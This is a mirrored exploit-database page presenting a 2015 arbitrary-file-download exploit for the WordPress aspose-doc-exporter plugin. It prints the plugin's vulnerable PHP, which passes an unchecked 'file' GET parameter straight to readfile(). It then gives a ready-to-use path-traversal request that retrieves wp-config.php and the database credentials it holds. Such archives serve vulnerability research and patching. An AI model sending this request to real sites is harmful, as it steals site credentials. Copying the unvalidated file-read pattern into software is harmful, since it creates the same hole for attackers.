bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/36559.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.5 KiB
Text
Raw Blame History

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
| [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
| [+] Tested on: Windows,Linux |
| [+] Date : 2015-03-28
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php |
| [+] Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
| [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
| [+]
| [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*
Reference in a new issue View git blame Copy permalink